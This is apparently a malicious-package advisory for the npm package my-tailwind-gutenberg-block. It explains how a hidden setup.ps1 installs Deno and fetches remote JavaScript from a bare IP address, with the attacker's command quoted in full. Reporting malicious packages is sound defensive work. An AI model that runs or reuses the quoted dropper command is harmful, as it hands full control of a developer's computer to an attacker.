MAL-2026-10761

    Dashboard / Malicious Package / MAL-2026-10761

    MAL-2026-10761

    Published: 16 Jul 2026Last Modified: 4 Aug 2026Aliases: 
    GHSA-mhvw-mw3c-6mc5

    Summary: Malicious code in my-tailwind-gutenberg-block (npm)

    Details: Source: amazon-inspector (8ba41c0d8f447e47febb6ceed2c87681bb0f518b74d42d898e024a7ab4418f61) The package advertises itself as a WordPress Gutenberg + Tailwind block scaffold (src/edit.js, src/save.js, block.json), but the tarball also contains setup.ps1, an undocumented PowerShell script unrelated to the stated purpose. When run, setup.ps1 installs Scoop, winget, and the Deno runtime on the user's Windows host, then invokes `deno run -A http://172.94.9.157/v028f8cde892b0b74c8.js` — executing unpinned, unverified JavaScript fetched over plain HTTP from a bare IP with all Deno permissions granted (filesystem, network, environment, subprocess). Comments in the script self-describe the fetched code as a launcher-1 eval-loop that pulls launcher-2, which then sets up autorun and runs a main payload, indicating persistence. The mismatch between the advertised WordPress-block purpose and a Windows runtime dropper is a cover-story pattern; the bare-IP plain-HTTP delivery of a mutable script under a fully-permissioned alternate runtime is an install-time remote-code-execution vector against any developer who runs setup.ps1. Source: ghsa-malware (964a3f6c00b9b203b2ce5d2bf2a913e877d136325b805010ef3615c2dcc6a52a) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: my-tailwind-gutenberg-block

    Purl: pkg:npm/my-tailwind-gutenberg-block

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    0.1.2
    0.1.4
    0.1.3
    0.1.5
    0.1.0
    MAL-2026-10761 | CVE-DB